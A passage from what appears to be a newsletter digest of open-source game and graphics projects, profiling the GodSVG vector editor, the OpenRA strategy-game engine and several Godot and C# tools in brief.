  • Three.js - lower-level rendering library lacking built-in physics
  • A-Frame - declarative VR framework on top of Three.js

GodSVG Refines Real-Time SVG Code Control 🔗

Late-alpha updates improve optimization and web deployment for clean structured editing

MewPurPur/GodSVG · GDScript · 2.4k stars Est. 2023

GodSVG has reached late alpha with measurable improvements to its real-time synchronization between visual canvas and raw SVG markup. Built in GDScript on the Godot engine, the editor treats SVG as structured data rather than a proprietary document format. Edits performed through the interface immediately update the code view, and the exported files contain no added metadata.

GodSVG has reached late alpha with measurable improvements to its real-time synchronization between visual canvas and raw SVG markup. Built in GDScript on the Godot engine, the editor treats SVG as structured data rather than a proprietary document format. Edits performed through the interface immediately update the code view, and the exported files contain no added metadata.

This matters now because web and game pipelines increasingly demand minimal, standards-compliant vector assets. GodSVG generates human-readable XML that integrates directly into Godot projects, frontend codebases, or technical documentation without cleanup steps. Optimization tools let users strip unnecessary attributes, shorten path commands, and enforce consistent decimal precision, producing smaller files that render identically across browsers and runtimes.

The application is available on Windows, macOS and Linux, with an official web build at godsvg.com/editor. Experimental Android versions require signature verification using the provided SHA-256 fingerprint. macOS users must bypass Gatekeeper, a limitation the solo developer attributes to distribution costs.

Development remains independent, funded largely by donations. The low-abstraction philosophy delivers precision that high-level design tools often sacrifice for convenience.

Use Cases
  • Godot engineers building precise vector UI elements
  • Web developers optimizing icons for production bundles
  • Technical illustrators authoring clean SVG documentation
Similar Projects
  • Inkscape - adds extensive metadata unlike GodSVG's clean output
  • SVG-Edit - browser tool lacking real-time bidirectional sync
  • Boxy SVG - simpler interface but higher abstraction level

OpenRA's Latest Release Refines Classic RTS Engine 🔗

Release-20250330 enhances compatibility, modding tools and performance for Red Alert and Dune

OpenRA/OpenRA · C# · 16.6k stars Est. 2010

OpenRA has issued release-20250330, delivering incremental upgrades to its C# engine that reimplements the core mechanics of Westwood's Command & Conquer: Red Alert, Tiberian Dawn and Dune 2000. The project, under active development since 2010, continues to provide fully playable, asset-independent versions that run natively on Windows, Linux, *BSD and macOS.

The update improves SDL and OpenGL handling for better high-DPI support and Apple Silicon performance, addressing compatibility issues that arise on newer distributions and kernels.

OpenRA has issued release-20250330, delivering incremental upgrades to its C# engine that reimplements the core mechanics of Westwood's Command & Conquer: Red Alert, Tiberian Dawn and Dune 2000. The project, under active development since 2010, continues to provide fully playable, asset-independent versions that run natively on Windows, Linux, *BSD and macOS.

The update improves SDL and OpenGL handling for better high-DPI support and Apple Silicon performance, addressing compatibility issues that arise on newer distributions and kernels. Modders now benefit from expanded trait documentation and more robust YAML parsing for unit behaviors, game rules and AI. The Lua API received refinements that simplify scripted mission triggers and event handling.

Mapping and total conversion workflows remain central. The in-game editor lets users alter gameplay radically through custom rules, while the Mod SDK supplies templates for new factions and mechanics. Maps and mods are distributed via the OpenRA Resource Center; dedicated server binaries allow instant multiplayer hosting.

In an age of subscription-based live-service titles, OpenRA preserves the precise balance and pace of these late-1990s originals. Its GPL-licensed codebase serves as both preservation tool and reference implementation for open game engine design.

Use Cases
  • Linux gamers replaying Red Alert at native resolutions without original discs
  • Modders building total conversions using YAML traits and Lua scripting
  • Developers hosting dedicated multiplayer servers for Tiberian Dawn matches
Similar Projects
  • 0 A.D. - open-source RTS engine focused on historical civilizations and campaigns
  • Spring RTS Engine - community-driven framework for physics-based multiplayer mods
  • OpenTTD - reimplementation of classic transport strategy with expanded networking

Quick Hits

gdUnit4 gdUnit4 embeds a full unit testing framework in Godot 4 for GDScript and C# with mocking, scene testing, assertions, and an integrated inspector. 1k
ZenteonFX ZenteonFX delivers a versatile collection of ReShade shaders that produce striking real-time visual effects and post-processing. 164
MonoGame MonoGame gives developers one efficient C# framework to build high-performance 2D and 3D games that run across platforms. 13.6k
pyxel Pyxel lets Python creators build authentic retro games inside a constrained 8-bit engine with pixel art, sound, and classic controls. 17.4k
Godot-Menus-Template Godot Menus Template instantly adds polished main menus, options, credits, and a robust scene loader to any new project. 420